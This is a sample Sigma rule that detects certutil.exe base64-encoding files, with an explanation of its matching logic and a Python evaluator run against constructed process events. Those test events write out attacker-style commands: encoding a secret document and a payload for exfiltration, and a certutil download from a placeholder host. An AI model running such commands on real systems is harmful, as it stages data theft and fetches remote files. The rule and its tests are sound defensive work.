Sample rules
File Encoded To Base64 Via Certutil.EXE
- source: sigma
- techniques:
- t1027 (Obfuscated Files or Information)
Description
Detects the execution of certutil.exe with the "-encode" flag, which base64-encodes an arbitrary input file. Encoding a file this way is a legitimate certificate-management operation (for example, converting a DER certificate to PEM), but attackers abuse it to obfuscate payloads and to prepare files for exfiltration as text. Review the input and output paths on the command line and the parent process before treating a hit as benign.
Detection logic
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_cli:
        CommandLine|contains|windash: '-encode'
    condition: all of selection_*

The two list items under selection_img are OR'ed, so a renamed certutil binary still matches on its OriginalFileName from the PE version resource. The windash modifier expands the "-" in "-encode" to the alternative switch characters Windows accepts (such as "/"), so "certutil /encode" is also caught. String matching in Sigma is case-insensitive, and contains also matches longer switches that begin with "-encode" (such as "-encodehex").
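The following is an added example, not part of the original rule or the Sigma project, that evaluates the detection logic above over a handful of constructed process-creation events. The dash variants it substitutes for the windash modifier, the event field names and the sample command lines are assumptions made for illustration; they approximate how a Sigma backend applies the rule but are not the project's own implementation.

```python
# Stand-alone evaluator for the certutil "-encode" Sigma rule above.
# Constructed example; the windash expansion list is an assumption that
# approximates the Sigma modifier (it is not the official implementation).

# Switch characters Windows command-line parsers commonly accept in place of "-".
DASH_VARIANTS = ["-", "/", "\u2013", "\u2014", "\u2015"]  # -, /, en dash, em dash, horizontal bar


def windash_variants(value: str) -> list[str]:
    """Expand a 'windash' value into every dash form it should match."""
    return [value.replace("-", d) for d in DASH_VARIANTS]


def match_selection_cli(event: dict) -> bool:
    """CommandLine|contains|windash: '-encode' (case-insensitive substring)."""
    cmd = event.get("CommandLine", "").lower()
    return any(variant.lower() in cmd for variant in windash_variants("-encode"))


def match_selection_img(event: dict) -> bool:
    """List items under selection_img are OR'ed: Image suffix OR OriginalFileName."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\certutil.exe") or original == "certutil.exe"


def rule_matches(event: dict) -> bool:
    """condition: all of selection_* -> every selection must hold."""
    return match_selection_cli(event) and match_selection_img(event)


def matching_ids(events: list[dict]) -> list[str]:
    """Return the ids of events the rule fires on, in input order."""
    return [e["id"] for e in events if rule_matches(e)]


# Constructed sample events (field names follow Sysmon/Sigma process_creation).
SAMPLE_EVENTS = [
    {   # plain abuse: base64-encode a document for later exfiltration
        "id": "evt1",
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -encode C:\Users\a\secret.docx C:\Users\a\secret.b64",
    },
    {   # same intent using the "/" switch character (caught by windash)
        "id": "evt2",
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe /encode C:\Temp\payload.exe C:\Temp\payload.txt",
    },
    {   # renamed binary with an en dash; Image fails, OriginalFileName still matches
        "id": "evt3",
        "Image": r"C:\Temp\cu.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": "cu.exe \u2013encode C:\\Temp\\in.bin C:\\Temp\\out.txt",
    },
    {   # decode, not encode: a different rule's concern
        "id": "evt4",
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -decode C:\Temp\out.txt C:\Temp\in.bin",
    },
    {   # "-encode" in the command line of an unrelated image: selection_img fails
        "id": "evt5",
        "Image": r"C:\Windows\System32\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "CommandLine": "notepad.exe -encode-settings.txt",
    },
    {   # certutil without the encode switch
        "id": "evt6",
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -urlcache -split -f http://example.invalid/a.txt a.txt",
    },
]

if __name__ == "__main__":
    print("alerts:", matching_ids(SAMPLE_EVENTS))  # alerts: ['evt1', 'evt2', 'evt3']
```

evt3 is the case worth keeping in mind when tuning: an attacker who copies certutil.exe under another name defeats the Image suffix check, and only the OriginalFileName comparison (which depends on your sensor populating that field) keeps the rule firing. If your telemetry lacks OriginalFileName, consider adding a hash- or signature-based selection rather than dropping the rule.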